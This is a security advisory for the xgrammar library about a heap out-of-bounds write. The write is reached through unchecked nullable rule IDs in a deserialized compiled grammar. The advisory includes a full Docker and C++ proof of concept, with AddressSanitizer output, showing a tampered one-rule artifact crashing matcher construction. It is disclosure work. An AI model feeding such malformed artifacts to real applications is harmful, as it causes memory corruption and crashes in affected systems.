All advisories
Published

Out-of-Bounds Write Through Deserialized Nullable Rule IDs

mlc-ai/xgrammar / GHSA-3gmq-qh92-5grm

Affected packages

xgrammar pip
Affected versions>= 0.1.23
Patched versionsNot specified

Description

Out-of-Bounds Write Through Deserialized Nullable Rule IDs

Affected repository: mlc-ai/xgrammar
Observed HEAD: a1a3904fa80316b9fc0f1940285e7792bd2071f7
Sink: cpp/earley_parser.cc:487 in xgrammar::EarleyParser::EarleyParser
Sanitizer verdict: AddressSanitizer heap-buffer-overflow, WRITE of size 1

Summary

CompiledGrammar::DeserializeJSON accepts rule IDs in grammar.allow_empty_rule_ids without checking that they identify a rule in the deserialized grammar. An attacker who can cause an application to restore an untrusted compiled-grammar cache can put [1] in a one-rule artifact. The artifact is accepted, and constructing GrammarMatcher then uses 1 as an unchecked index into a one-byte nullable-rule vector. AddressSanitizer records a one-byte out-of-bounds write and process abort during matcher construction.

Detail

The broken invariant crosses deserialization and matcher initialization: every member of allow_empty_rule_ids must be in the half-open range [0, grammar.NumRules()), but the trust boundary checks only the JSON representation, not that semantic relationship.

In cpp/compiled_grammar.cc, DeserializeJSONValue asks the generic reflection-based deserializer to restore the nested Grammar:

if (object.find("grammar") == object.end()) {
  return ConstructDeserializeError("Expect a 'grammar' field", type_name);
}
AutoDeserializeJSONValue(&(impl->grammar), object["grammar"], type_name);

The generic deserializer verifies that allow_empty_rule_ids is an array of integers and converts each value to int32_t; it does not know that those integers index Grammar::Impl::rules_. Consequently, the syntactically valid value 1 survives in a grammar containing one rule, even though the only valid rule ID is 0. CompiledGrammar::DeserializeJSON returns the inconsistent object as usable.

GrammarMatcher construction creates an EarleyParser. Its constructor sizes rule_is_nullable_ from the trusted rule count and then treats every deserialized nullable-rule ID as an index:

EarleyParser::EarleyParser(const Grammar& grammar, std::optional<ParserState> initial_state)
    : grammar_(grammar),
      fsm_state_flags_cache_(grammar->NumRules()),
      rule_is_nullable_(grammar->NumRules(), 0) {
  // ...
  for (int32_t rule_id : grammar_->allow_empty_rule_ids) {
    rule_is_nullable_[rule_id] = true;
  }

For the PoC grammar, NumRules() is 1, so rule_is_nullable_ owns one byte at index 0. Index 1 writes exactly one byte past that allocation. A negative ID is also unsafe because std::vector::operator[] converts it to an unsigned index. This path requires control of a serialized CompiledGrammar artifact and an application that deserializes it and constructs a matcher. Ordinary EBNF compilation computes valid nullable IDs internally, so grammar text alone does not reach the vulnerable path. The demonstrated impact is memory corruption and process abort; code execution was not demonstrated.

Reproduce

Run this command in a disposable Docker environment. It shallow-clones the current default branch, prints the resolved revision, builds the public C++ library with AddressSanitizer, modifies a serialized one-rule grammar through the public API, and constructs GrammarMatcher. The non-interactive debugger disables only ASan's unstable SIGSEGV handler so ASan can emit the full heap-buffer-overflow diagnostic.

docker run --rm -i debian:bookworm-slim bash <<'DOCKER'
set -euxo pipefail
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++ gdb
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git submodule update --init --recursive --depth 1
git rev-parse HEAD

cat > config.cmake <<'CMAKE'
set(CMAKE_BUILD_TYPE Debug)
set(XGRAMMAR_BUILD_PYTHON_BINDINGS OFF)
set(XGRAMMAR_BUILD_CXX_TESTS OFF)
set(XGRAMMAR_ENABLE_CPPTRACE OFF)
set(XGRAMMAR_ENABLE_INTERNAL_CHECK OFF)
CMAKE

cmake -S . -B build -G Ninja \
  -DCMAKE_CXX_FLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
  -DCMAKE_EXE_LINKER_FLAGS='-fno-lto -fsanitize=address'
cmake --build build --target xgrammar -j2

cat > /tmp/repro.cc <<'CPP'
#include <picojson.h>
#include <xgrammar/compiler.h>
#include <xgrammar/matcher.h>
#include <xgrammar/tokenizer_info.h>

#include <cstdint>
#include <iostream>
#include <string>
#include <utility>
#include <variant>

int main() {
  xgrammar::TokenizerInfo tokenizer({"a"});
  xgrammar::GrammarCompiler compiler(tokenizer, 1, false);
  xgrammar::CompiledGrammar compiled = compiler.CompileGrammar("root ::= \"a\"");

  picojson::value artifact;
  const std::string parse_error = picojson::parse(artifact, compiled.SerializeJSON());
  if (!parse_error.empty()) return 2;
  auto& artifact_object = artifact.get<picojson::object>();
  auto& grammar_object = artifact_object.at("grammar").get<picojson::object>();
  picojson::array invalid_rule_ids;
  invalid_rule_ids.emplace_back(static_cast<int64_t>(1));
  grammar_object["allow_empty_rule_ids"] = picojson::value(std::move(invalid_rule_ids));

  auto restored = xgrammar::CompiledGrammar::DeserializeJSON(artifact.serialize(), tokenizer);
  if (!std::holds_alternative<xgrammar::CompiledGrammar>(restored)) {
    std::cerr << "DESERIALIZATION_REJECTED\n";
    return 3;
  }
  std::cerr << "DESERIALIZATION_ACCEPTED\n";
  xgrammar::GrammarMatcher matcher(std::get<xgrammar::CompiledGrammar>(std::move(restored)));
  return 0;
}
CPP

g++ -std=c++17 -D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address \
  -fno-omit-frame-pointer -g \
  -Iinclude -I3rdparty/picojson -I3rdparty/dlpack/include \
  /tmp/repro.cc build/libxgrammar.a -pthread -ldl -o /tmp/repro

gdb -q -batch \
  -ex 'set environment ASAN_OPTIONS handle_segv=0:detect_leaks=0' \
  -ex run -ex quit --args /tmp/repro
DOCKER

The run at the revision shown above produced:

DESERIALIZATION_ACCEPTED
=================================================================
ERROR: AddressSanitizer: heap-buffer-overflow
WRITE of size 1
    #0 in xgrammar::EarleyParser::EarleyParser(...) cpp/earley_parser.cc:487
    #1 in xgrammar::GrammarMatcher::Impl::Impl(...) cpp/grammar_matcher.cc:475
0 bytes to the right of 1-byte region
SUMMARY: AddressSanitizer: heap-buffer-overflow in xgrammar::EarleyParser::EarleyParser(...)
ABORTING

Credit

Zheng Yu @ Depthfirst